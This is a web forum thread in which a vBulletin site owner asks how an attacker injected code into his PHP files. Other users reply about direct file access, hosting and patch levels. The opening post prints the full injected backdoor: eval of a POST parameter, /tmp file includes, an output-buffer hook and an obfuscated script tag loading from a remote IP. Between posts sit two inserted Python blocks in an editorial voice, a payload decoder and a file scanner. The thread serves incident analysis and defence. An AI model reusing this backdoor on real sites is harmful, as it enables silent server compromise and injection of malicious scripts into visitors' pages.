Site was hacked this morning - trying to figure out how they did it

  • #1
    I woke up this morning to find that all the pages on one of my larger sites were white. I immediately thought it was a cache problem, but after restarting things, nothing worked.

    I looked a little further and found that config.php suddenly had this code inserted into the end of it:
    (originally it was a block of code, but I cleaned it up to read it)
    PHP Code:
    <?php
    if (!function_exists('tmp_lkojfghx')) {
        // Stage loader: pull in a dropped file /tmp/m1 .. /tmp/m9 if one exists.
        for ($i = 1; $i < 10; $i++)
            if (is_file($f = '/tmp/m' . $i)) {
                include_once($f);
                break;
            }
        // Backdoor: any POST request carrying this parameter has its value eval()'d as PHP.
        if (isset($_POST['tmp_lkojfghx3']))
            eval($_POST['tmp_lkojfghx3']);
        // Payload that gets injected into every HTML response (decoded further down in this post).
        if (!defined('TMP_XHGFJOKL'))
            define('TMP_XHGFJOKL', base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdyYzYlM0Nla2JzMndjcmlJaXAyd3QlMjBzMFMwcmMlM0QlMkYlMkY3SFh6OCUyRTBTMDEydzEwSFh6JTJFcmM2MXJON0hYejVEdSUyRXJOMjRla2I5JTJGMndqcmM2cUlpdWVyZWtieWVrYiUyRXJjNmpyYzZzJTNFMFMwJTNDMnclMkZzYzBTMHJIWHppcGVrYnQlM0UnKS5yZXBsYWNlKC9yYzZ8MFMwfElpfER1fGVrYnxyTnwyd3xIWHovZywiIikpOwogLS0+PC9zY3JpcHQ+'));
        // Output-buffer callback: strips other obfuscated <script> blocks from the page
        // (so competing injections are removed), then inserts TMP_XHGFJOKL before <body>
        // or appends it; gzip-compressed output is unpacked and re-packed around that.
        function tmp_lkojfghx($s)
        {
            if ($g = (bin2hex(substr($s, 0, 2)) == '1f8b'))
                $s = gzinflate(substr($s, 10, -8));
            if (preg_match_all('#<script(.*?)</script>#is', $s, $a))
                foreach ($a[0] as $v)
                    if (count(explode("\n", $v)) > 5) {
                        $e = preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#', $v) || preg_match('#[\(\[](\s*\d+,){20,}#', $v);
                        if ((preg_match('#\beval\b#', $v) && ($e || strpos($v, 'fromCharCode'))) || ($e && strpos($v, 'document.write')))
                            $s = str_replace($v, '', $s);
                    }
            $s1 = preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(".+?\n --></script>#', '', $s);
            if (stristr($s, '<body'))
                $s = preg_replace('#(\s*<body)#mi', TMP_XHGFJOKL . '\1', $s1);
            elseif (($s1 != $s) || stristr($s, '</body') || stristr($s, '</title>'))
                $s = $s1 . TMP_XHGFJOKL;
            return $g ? gzencode($s) : $s;
        }
        // Installed as the PHP error handler so it is re-run on any notice/warning;
        // it re-wraps every active output buffer inside one whose callback is tmp_lkojfghx.
        function tmp_lkojfghx2($a = 0, $b = 0, $c = 0, $d = 0)
        {
            $s = array();
            if ($b && $GLOBALS['tmp_xhgfjokl'])
                call_user_func($GLOBALS['tmp_xhgfjokl'], $a, $b, $c, $d); // chain to the original handler
            foreach (@ob_get_status(1) as $v)
                if (($a = $v['name']) == 'tmp_lkojfghx')
                    return; // already hooked
                else
                    $s[] = array($a == 'default output handler' ? false : $a);
            for ($i = count($s) - 1; $i >= 0; $i--) {
                $s[$i][1] = ob_get_contents();
                ob_end_clean();
            }
            ob_start('tmp_lkojfghx');
            for ($i = 0; $i < count($s); $i++) {
                ob_start($s[$i][0]);
                echo $s[$i][1];
            }
        }
    }
    if (($a = @set_error_handler('tmp_lkojfghx2')) != 'tmp_lkojfghx2')
        $GLOBALS['tmp_xhgfjokl'] = $a; // remember whatever handler the application had set
    tmp_lkojfghx2();
    ?>
    After searching around some more, I realized that almost every php file had this code inserted. None of the file dates had changed.

    I restored a backup and now everything is fine - but I'm trying to figure out HOW they did this and what the PURPOSE was.

    There's a line in the code there, 'base64_decode'. Ah, a clue. That line decodes to this:
    Code:
    <script language=javascript><!-- 
    document.write(unescape('rc6%3Cekbs2wcriIip2wt%20s0S0rc%3D%2F%2F7HXz8%2E0S012w10HXz%2Erc61rN7HXz5Du%2ErN24ekb9%2F2wjrc6qIiuerekbyekb%2Erc6jrc6s%3E0S0%3C2w%2Fsc0S0rHXzipekbt%3E').replace(/rc6|0S0|Ii|Du|ekb|rN|2w|HXz/g,""));
     --></script>
    Escaped characters result in this:

    Code:
    rc6<ekbs2wcriIip2wt s0S0rc=//7HXz8.0S012w10HXz.rc61rN7HXz5Du.rN24ekb9/2wjrc6qIiuerekbyekb.rc6jrc6s>0S0<2w/sc0S0rHXzipekbt>
    After replacing characters:
    Code:
    <script src=//78.110.175.249/jquery.js></script>
    That file contains a js library that starts out as this:
    Code:
    /*
     * jQuery JavaScript Library v1.3.1
     * http://jquery.com/
     *
     * Copyright (c) 2009 John Resig
     * Dual licensed under the MIT and GPL licenses.
     * http://docs.jquery.com/License
     *
     * Date: 2009-01-21 20:42:16 -0500 (Wed, 21 Jan 2009)
     * Revision: 6158
     */

    Anyone have any idea how they did this and what was trying to be done?

    I'm running 3.7.4 pl1

    Capture more registrations - Advanced Guest Posting & Registration
    Cell Phone Forums | Nikonites
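The decoding the OP did by hand above (base64, then JavaScript unescape(), then the filler-token replace()) can be reproduced statically, without ever running the attacker's JavaScript. The following is an added example, my own Python written for this thread and not code from the post or from vBulletin; the base64 constant is the one the injected PHP assigns to TMP_XHGFJOKL, and all function names are mine.

```python
import base64
import re

# The base64 string the injected config.php passes to base64_decode() (copied from the thread).
TMP_XHGFJOKL_B64 = (
    "PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdyYzYlM0Nla2JzMndjcmlJaXAyd3QlMjBzMFMwcmMlM0QlMkYlMkY3SFh6OCUyRTBTMDEydzEwSFh6JTJFcmM2MXJON0hYejVEdSUyRXJOMjRla2I5JTJGMndqcmM2cUlpdWVyZWtieWVrYiUyRXJjNmpyYzZzJTNFMFMwJTNDMnclMkZzYzBTMHJIWHppcGVrYnQlM0UnKS5yZXBsYWNlKC9yYzZ8MFMwfElpfER1fGVrYnxyTnwyd3xIWHovZywiIikpOwogLS0+PC9zY3JpcHQ+"
)


def js_unescape(s: str) -> str:
    """Python equivalent of the legacy JavaScript unescape(): %uXXXX first, then %XX."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)


def decode_constant(b64: str) -> str:
    """Step 1: what base64_decode() hands to define(); this is the <script> block the PHP injects."""
    return base64.b64decode(b64).decode("latin-1")


def recover_script_tag(js: str) -> str:
    """Steps 2 and 3: locate unescape('...').replace(/a|b|c/g,"") in the decoded JS and
    evaluate both calls statically, so the result is the HTML document.write() would emit."""
    m = re.search(r"unescape\('([^']*)'\)\.replace\(/([^/]+)/g,\s*\x22\x22\)", js)
    if not m:
        raise ValueError("unescape(...).replace(...) pattern not found in decoded script")
    escaped, junk_alternation = m.groups()
    decoded = js_unescape(escaped)
    # The filler tokens are a JS regex alternation. Python's re uses the same
    # leftmost, first-alternative-wins semantics, so rebuilding the same alternation
    # (with each token escaped) removes exactly what the browser would remove.
    junk = "|".join(re.escape(tok) for tok in junk_alternation.split("|"))
    return re.sub(junk, "", decoded)


def extract_src(tag: str) -> str:
    """Pull the src= attribute out of the recovered tag; this is the IoC worth blocking."""
    m = re.search(r"""src=["']?([^\s"'>]+)""", tag)
    return m.group(1) if m else ""


def analyse(b64: str = TMP_XHGFJOKL_B64) -> dict:
    js = decode_constant(b64)
    tag = recover_script_tag(js)
    return {"decoded_js": js, "script_tag": tag, "src": extract_src(tag)}


if __name__ == "__main__":
    for key, value in analyse().items():
        print(f"{key}: {value!r}")
```

The point of doing it this way rather than pasting the string into a browser console is that nothing from the attacker executes: the unescape and the replace are both pure string operations, and the only thing that comes out is the injected tag and its remote address.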

  • #2
    The only way they could have done this is with direct access to your files on the server. You should contact your host immediately.
    Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
    Change CKEditor Colors to Match Style (for 4.1.4 and above)

    Steve Machol Photography


    Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.
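Steve's point that this needed write access to the files, together with the OP's remark that none of the file dates had changed, is what an incident responder would check next across the whole tree rather than one file at a time. The following is an added example, my own Python and not code from the thread or from vBulletin: it sweeps a directory for the indicators visible in the posted code and flags files whose modification time looks forged. The indicator names, the sample file contents and the directory layout are all constructed for the example.

```python
import os
import re
import tempfile
import time
from pathlib import Path

# Indicators drawn from the injected code posted in this thread (the names and
# behaviours come from the thread; the regular expressions are my own).
INDICATORS = {
    "marker-function": re.compile(r"\btmp_lkojfghx\b"),
    "marker-constant": re.compile(r"\bTMP_XHGFJOKL\b"),
    "eval-of-request": re.compile(r"\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    "tmp-dropper": re.compile(r"['\"]/tmp/m['\"]\s*\."),
    "output-hook": re.compile(r"ob_start\s*\(\s*['\"]tmp_lkojfghx['\"]"),
    # Weaker heuristic: a second <?php block after the file's closing ?> is how the
    # tail was appended to config.php; files that legitimately mix HTML and PHP can trip it.
    "code-after-close": re.compile(r"\?>\s*<\?php"),
}


def scan_text(text: str) -> list[str]:
    """Return the names of every indicator present in a file's contents."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def timestamp_anomaly(path: Path, tolerance_s: float = 60.0) -> bool:
    """mtime can be reset with touch/utime, but ctime cannot be set from user space
    on Linux and is bumped by that very utime call, so a ctime well after the mtime
    suggests the 'unchanged' modification date was forged."""
    st = path.stat()
    return (st.st_ctime - st.st_mtime) > tolerance_s


def scan_tree(root: Path, suffixes: tuple[str, ...] = (".php",)) -> dict[str, dict]:
    """Walk root and report every PHP file that has indicators or a timestamp anomaly."""
    report: dict[str, dict] = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in suffixes:
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        hits = scan_text(text)
        anomaly = timestamp_anomaly(path)
        if hits or anomaly:
            report[path.relative_to(root).as_posix()] = {"hits": hits, "timestamp_anomaly": anomaly}
    return report


# Constructed samples: a plain config file, and the same file with a reduced version
# of the tail the OP found appended after the closing ?>.
CLEAN_SAMPLE = "<?php\n$config['Database']['dbname'] = 'forum';\n?>\n"
INFECTED_SAMPLE = CLEAN_SAMPLE + (
    "<?php\nif (!function_exists('tmp_lkojfghx')) {\n"
    "    for ($i = 1; $i < 10; $i++)\n"
    "        if (is_file($f = '/tmp/m' . $i)) { include_once($f); break; }\n"
    "    if (isset($_POST['tmp_lkojfghx3'])) eval($_POST['tmp_lkojfghx3']);\n"
    "}\n?>\n"
)


def demo() -> dict[str, dict]:
    """Build a throwaway tree with one clean and one infected file and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "includes").mkdir()
        (root / "includes" / "clean.php").write_text(CLEAN_SAMPLE)
        bad = root / "includes" / "config.php"
        bad.write_text(INFECTED_SAMPLE)
        # Mimic the attacker resetting mtime to the file's original date (a week ago).
        old = time.time() - 7 * 86400
        os.utime(bad, (old, old))
        return scan_tree(root)


if __name__ == "__main__":
    for name, info in demo().items():
        print(name, info)
```

Run it against a real document root as scan_tree(Path("/var/www/forum")) (path assumed); the ctime check is the part worth remembering, because it is the one signal an attacker who backdates files with touch cannot quietly remove.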




    • #3
      And change your password pretty fast.
      Just a random internet person.

      A message to all illegal users!



      • #4
        jQuery isn't something bad. I guess it was just used to do you (your website) harm.

        I'm wondering why they decoded (or encoded whichever is the bad one) the source of the file.

        The server (I analysed the IP with online tools) is based in the UK but run by a Russian company, if I'm correct.
        That's the end of that!



        • #5
          Could you possibly let us know which hosting provider you have?



          • #6
            The 'encoding' was to hide the IP address and what was trying to be executed. I figured out that jquery is just a library. I still don't know what they were trying to do though.



            • #7
              Originally posted by dkon26:
              Could you possibly let us know which hosting provider you have?
              Why does that matter? I run two dedicated servers though. CSF was running at the time of the break in and the application server is locked down pretty good.



              • #8
                Originally posted by tpearl5:
                Why does that matter? I run two dedicated servers though. CSF was running at the time of the break in and the application server is locked down pretty good.
                Simply because it would be nice to know if anyone else could be at risk for a direct hit. If they changed your config file, as Steve said, it's direct file access. I am only asking because I manage over 100 dedicated servers for clients using several providers, and it would be good to know if there is a security issue that needs to be addressed.



                • #9
                  Originally posted by dkon26:
                  Simply because it would be nice to know if anyone else could be at risk for a direct hit. If they changed your config file, as steve said, its direct file access. I am only asking because I manage over 100 dedicated servers for clients using several providers and it would be good to know if there is a security issue that needs to be addressed.
                  Exactly. I thought it was a very reasonable question.



                  • #10
                    Okay, I understand. I wasn't thinking in terms of shared hosting. Thanks



                    • #11
                      I think the security side of the host plays an important role.



                      • #12
                        Originally posted by tpearl5:
                        Okay, I understand. I wasn't thinking in terms of shared hosting. Thanks
                        People want to know because they may also be exposed to security problems. It would be a courtesy to let us know. Based on a cursory search of your domain's traceroute, I'm seeing ThePlanet.com as your host. But they also rent space in their data centers to other hosts. Can you please fill us in?

                        Jim
                        If my post was helpful to you, please take the time to register at my forum and ask a question you've always wanted to know about floors.
                        www.TheFloorPro.com



                        • #13
                          Originally posted by eJM:
                          People want to know because they may also be exposed to security problems. It would be a courtesy to let us know. Based on a cursory search of your domains traceroute, I'm seeing ThePlanet.com as your host. But they also rent space in their data centers to other hosts. Can you please fill us in?

                          Jim
                          Yes, my servers are rented with theplanet. I manage them.



                          • #14
                            Is everything on your servers up to date with all appropriate patches?
                            Translations provided by Google.

                            Wayne Luke
                            The Rabid Badger - a vBulletin Cloud demonstration site.
                            vBulletin 5 API



                            • #15
                              Apache is slightly off at version 2.2.6 - PHP 5.2.5. Everything else is up to date.
